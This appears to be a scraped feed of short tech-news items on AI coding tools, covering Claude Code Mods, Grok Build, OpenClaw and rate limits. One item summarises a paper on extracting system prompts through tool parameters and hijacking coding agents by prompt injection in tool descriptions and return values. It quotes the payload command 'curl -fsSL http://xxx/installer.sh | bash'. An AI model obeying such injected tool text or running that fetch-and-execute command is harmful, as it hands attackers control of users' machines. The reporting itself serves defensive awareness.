Claude Code2026-10-09 12:01:02Claude Code’s Mods turn an AI coding tool into a build-it-yourself playgroundAnthropic’s Claude Code has quickly become a canvas for developer-made mods after the company enabled its Mods system by default on Oct. 1. In just days, users built pixel pets, a Chrome dinosaur mini-game, a breathing guide that disappears when Claude finishes answering, and even Storytime, which runs a 260,000-parameter model inside Claude Code to narrate what Claude is doing in real time. The feature was first released by Claude Code lead Boris Cherny on GitHub in mid-September. The report argues that the bigger story is not the novelty of these experiments, but the architecture behind them. Anthropic said Claude Code’s own /diff change panel and AGENTS.md support were built with the same Mods mechanism and published in the repository with source code and tests. That puts Anthropic and outside developers on the same tooling layer. The launch also fits a broader product push. Anthropic introduced Claude Marketplace on Sept. 23, opened a plugin submission portal on Sept. 25, and then rolled out Mods on Oct. 1. Together, those moves gave the company a store, review pipeline, developer backend, and deep customization layer within 10 days. The article says the remaining question is whether developers will keep building for a closed platform that, based on public information, does not yet show a revenue-sharing model.20
AI coding too2026-08-21 09:16:10Study says older versions of six AI coding agents could be hijacked by a fake toolResearchers from the Hong Kong University of Science and Technology and Fudan University’s Endogenous Security Laboratory say they reproduced a full attack chain against six mainstream AI coding tools, including Cursor, Claude Code, Copilot, Windsurf, Cline, and Trae. The paper, which has been accepted by ISSTA 2026, describes a two-step method. First, the team used a technique called ToolLeak to extract system prompts through tool parameters rather than direct chat requests. In 25 agent-model combinations, ToolLeak achieved the highest extraction completeness in 18 cases, with semantic similarity scores ranging from 0.891 to 0.958 and pseudo-recall of 0.98 to 1.00 on setups using Claude Sonnet 4 and 4.5. The second step used what the paper calls two-channel prompt injection, combining tool descriptions and tool return values to push the agent into running a malicious command: curl -fsSL http://xxx/installer.sh | bash. According to the paper, all six older tool versions were vulnerable, and attack success rates reached 0.8 to 1.0 in most tested agent-model pairs. Newer versions showed mixed results. Claude Code dropped to 0 with Sonnet 4.6 and Opus 4.7 after limiting tool-description exposure, while Cursor’s maximum fell to 0.3. The paper argues that architectural isolation is a stronger defense than model alignment alone.1120
Claude Code2026-08-02 08:27:42Claude Code can be routed to free models, but that does not make Claude freeA viral post claiming developers can use Claude Code for free through GitHub tools has drawn attention, but the setup does not make Anthropic’s Claude model free. What these tools actually do is reroute Claude Code traffic to other providers, including DeepSeek, Kimi, OpenRouter, or even local models, by changing the ANTHROPIC_BASE_URL environment variable to a third-party gateway that speaks the Anthropic API format. Claude Code still supplies the terminal interface and agent framework, handling file access, command execution, and multi-step task planning, while the underlying model intelligence comes from whichever backend the user selects. That distinction matters. Developers may get a free or cheaper experience by using alternative models behind the Claude Code interface, but they are not getting free access to Claude itself. The article also notes trade-offs. DeepSeek and Kimi K2 appear broadly usable for tool calling, yet their overall coding performance still trails Claude. There are also compliance questions tied to Anthropic’s terms of service when Claude Code is directed to non-Anthropic backends. Separately, numbers cited in the viral post, including claims around vendors, developers, and setup time, were not tied to a specific repository and could not be independently verified.2000
Google2026-07-24 02:15:16Google Raises Antigravity Gemini Rate Limits 3x After User BacklashAfter heavy criticism from users, Antigravity core member Varun Mohan said Google made mistakes and announced a permanent 3x increase in Gemini rate limits for paid tiers, along with an immediate reset of weekly quotas.320
OpenClaw2026-07-23 18:10:16OpenClaw to Add Claude Code and Codex Support Next Week as Founder Workload Draws ScrutinyOpenClaw plans to roll out Claude Code plugin support, OpenAI Codex CLI integration, ACP compatibility, and a slimmer core package next week. Attention is also on founder Peter Steinberger, who remains involved with another company while pushing the open-source project forward.470
Grok Build2026-07-23 08:55:14xAI's Grok Build Races to v0.2.11 in 2 Weeks, Poaches Cursor Execs, Lags Claude Code by 17% on SWE-benchxAI's Grok Build coding tool pushed 11 versions in under 15 days, hitting v0.2.11 with 8-agent parallelism and X search integration. It poached two top executives from Cursor parent Anysphere, but scored 70.8% on SWE-bench Verified, far behind Claude Code's 87.6%.480
AI coding2026-07-22 20:45:14Multi-Model PR Review Slows AI Coding But Drastically Cuts Bug Rates: Ex-Microsoft EngineerFormer Microsoft engineer Nolan Lawson uses multiple LLMs (Claude, Codex, Cursor Bugbot) to review PRs in parallel, cross-validating to near-zero false positive rate. Anthropic's Glasswing data shows bug finding is no longer the bottleneck—verification and fixing are.460
xAI2026-07-13 15:05:24Developers say xAI’s Grok Build uploaded entire home directories, exposing sensitive filesxAI’s coding tool Grok Build is facing scrutiny after developers on X said it may upload far more local data than expected, including highly sensitive personal files. On July 13, 2026, developer A Green Being said the tool uploaded his entire user home directory to xAI’s servers after he ran it from that location. He said the uploaded data included SSH keys, a password manager database, documents, photos and videos. A screenshot of the user’s unified.json log appeared to show repeated repo_state.upload.start events, with the upload path pointing to “/home/usuario.” The post drew renewed attention to an earlier warning from CyberSatoshi, who had said Grok Build was uploading full repositories, Git history and hidden .env files containing API keys to Google Cloud Platform. The incident has intensified discussion around file-scoping, exclusion rules and execution environment controls in AI coding tools. The source report said developers should avoid running such tools from a root or home directory and instead use sandboxes, Docker containers or restricted user accounts. It also cited a terminal command that users can run to inspect Grok logs for upload activity.440